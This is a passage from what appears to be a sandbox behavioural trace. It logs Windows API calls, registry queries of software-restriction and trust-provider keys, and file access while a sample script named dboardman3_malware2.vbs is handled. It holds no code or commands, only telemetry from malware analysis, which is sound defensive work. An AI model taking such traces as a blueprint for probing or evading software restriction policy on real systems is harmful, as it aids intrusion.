DesiredAccess => 131097 KeyHandle => 0x0000016c ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\Nls\Language Groups |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtQueryValueKey |
Information => 1\x00\x00\x00 KeyHandle => 0x00000160 ValueName => 00000409 Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtQueryValueKey |
Information => 1\x00\x00\x00 KeyHandle => 0x0000016c ValueName => 1 Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtQueryInformationFile |
FileHandle => 0x00000170 FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x00000174 FileHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,303 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013f408 SectionHandle => 0x00000174 ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrLoadDll |
Flags => 1307548 BaseAddress => 0x77dd0000 FileName => C:\WINDOWS\system32\advapi32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SaferIdentifyLevel FunctionAddress => 0x77dd9eb8 ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SaferComputeTokenFromLevel FunctionAddress => 0x77ddab2d ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SaferCloseLevel FunctionAddress => 0x77ddaf88 ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\LevelObjects |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 1 KeyHandle => 0x00000170 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
KeyHandle => 0x00000170 ValueName => Levels |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | LdrGetDllHandle |
ModuleHandle => 0x77dd0000 FileName => advapi32 |
SUCCESS | 0x00000000 | 4 times |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000170 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 0 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {dda3f824-d8cb-441b-834d-be2efd2c1a33} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => %\x00H\x00K\x00E\x00Y\x00_\x00C\x00U\x00R\x00R\x00E\x00N\x00T\x00_\x00U\x00S\x00E\x00R\x00\\x00S\x00o\x00f\x00t\x00w\x00a\x00r\x00e\x00\\x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00\\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00\\x00C\x00u\x00r\x00r\x00e\x00n\x00t\x00V\x00e\x00r\x00s\x00i\x00o\x00n\x00\\x00E\x00x\x00p\x00l\x00o\x00r\x00e\x00r\x00\\x00S\x00h\x00e\x00l\x00l\x00 \x00F\x00o\x00l\x00d\x00e\x00r\x00s\x00\\x00C\x00a\x00c\x00h\x00e\x00%\x00O\x00L\x00K\x00*\x00\x00\x00 KeyHandle => 0x00000174 ValueName => ItemData Type => 2 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 1 KeyHandle => 0x00000170 |
FAILURE | 0x8000001a | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000170 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 0 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {349d35ab-37b5-462f-9b89-edd5fbde1328} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemData Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 32771 KeyHandle => 0x00000174 ValueName => HashAlg Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemSize Type => 11 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 1 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {7fb9cd2e-3076-4df9-a57b-b813f72dbb91} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemData Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 32771 KeyHandle => 0x00000174 ValueName => HashAlg Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemSize Type => 11 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 2 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {81d1fe15-dd9d-4762-b16d-7c29ddecae3f} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemData Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 32771 KeyHandle => 0x00000174 ValueName => HashAlg Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemSize Type => 11 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 3 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {94e3e076-8f53-42a5-8411-085bcc18a68d} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemData Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 32771 KeyHandle => 0x00000174 ValueName => HashAlg Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemSize Type => 11 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 4 KeyHandle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000174 ObjectAttributes => {dc971ee5-44eb-4fe4-ae2e-b91490411bfc} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemData Type => 3 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 32771 KeyHandle => 0x00000174 ValueName => HashAlg Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => KeyHandle => 0x00000174 ValueName => ItemSize Type => 11 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => SaferFlags Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtEnumerateKey |
Index => 5 KeyHandle => 0x00000170 |
FAILURE | 0x8000001a | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000170 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 262144 KeyHandle => 0x00000170 ValueName => DefaultLevel Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 1 KeyHandle => 0x00000174 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey |
Information => 0 KeyHandle => 0x00000174 ValueName => PolicyScope Type => 4 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryInformationFile |
FileHandle => 0x00000174 FileInformation => l\x00\x00\x00\\x00D\x00O\x00C\x00U\x00M\x00E\x00~\x001\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00L\x00O\x00C\x00A\x00L\x00S\x00~\x001\x00\\x00T\x00e\x00m\x00p\x00\\x00d\x00b\x00o\x00a\x00r\x00d\x00m\x00a\x00n\x003\x00_\x00m\x00a\x00l\x00w\x00a\x00r\x00e\x002\x00.\x00v\x00b\x00s\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1 |
SUCCESS | 0x00189d80 | |
| 19:40:26,313 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo |
SUCCESS | 0x00189d80 | |
| 19:40:26,313 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1 |
SUCCESS | 0x00189d80 | |
| 19:40:26,313 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp |
SUCCESS | 0x00189d80 | |
| 19:40:26,313 | 252 | LdrLoadDll |
Flags => 1306996 BaseAddress => 0x76c30000 FileName => WINTRUST.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => WinVerifyTrust FunctionAddress => 0x76c32f2c ModuleHandle => 0x76c30000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtSetInformationFile |
FileHandle => 0x00000174 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => Re FileHandle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW |
Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => W\x00i\x00n\x00t\x00r\x00u\x00s\x00t\x00C\x00e\x00r\x00t\x00i\x00f\x00i\x00c\x00a\x00t\x00e\x00T\x00r\x00u\x00s\x00t\x00\x00\x00 ValueName => $Function |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey |
Handle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW |
Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00A\x00u\x00t\x00h\x00e\x00n\x00t\x00i\x00c\x00o\x00d\x00e\x00\x00\x00 ValueName => $Function |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey |
Handle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW |
Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00I\x00n\x00i\x00t\x00i\x00a\x00l\x00i\x00z\x00e\x00\x00\x00 ValueName => $Function |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey |
Handle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW |
Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00L\x00o\x00a\x00d\x00M\x00e\x00s\x00s\x00a\x00g\x00e\x00\x00\x00 ValueName => $Function |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey |
Handle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW |
Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00L\x00o\x00a\x00d\x00S\x00i\x00g\x00n\x00a\x00t\x00u\x00r\x00e\x00\x00\x00 ValueName => $Function |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey |
Handle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW |
Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00C\x00h\x00e\x00c\x00k\x00C\x00e\x00r\x00t\x00\x00\x00 ValueName => $Function |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey |
Handle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} |
FAILURE | 0x00000002 | |
| 19:40:26,313 | 252 | RegOpenKeyExW |
Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\Cleanup\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00C\x00l\x00e\x00a\x00n\x00u\x00p\x00\x00\x00 ValueName => $Function |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey |
Handle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => WintrustCertificateTrust FunctionAddress => 0x76c33373 ModuleHandle => 0x76c30000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SoftpubAuthenticode FunctionAddress => 0x76c3386c ModuleHandle => 0x76c30000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SoftpubInitialize FunctionAddress => 0x76c3342c ModuleHandle => 0x76c30000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SoftpubLoadMessage FunctionAddress => 0x76c334e6 ModuleHandle => 0x76c30000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SoftpubLoadSignature FunctionAddress => 0x76c333c4 ModuleHandle => 0x76c30000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SoftpubCheckCert FunctionAddress => 0x76c393db ModuleHandle => 0x76c30000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SoftpubCleanup FunctionAddress => 0x76c335dc ModuleHandle => 0x76c30000 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x0000018c ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x0000018c SubKey => SOFTWARE\Microsoft\Cryptography\Providers\Type 001 |
FAILURE | 0x00000002 | |
| 19:40:26,313 | 252 | RegOpenKeyExA |
Handle => 0x0000018c Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 001 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExA |
Handle => 0x0000018c DataLength => 40 ValueName => Name Type => 1 |
SUCCESS | 0x00000000 | |
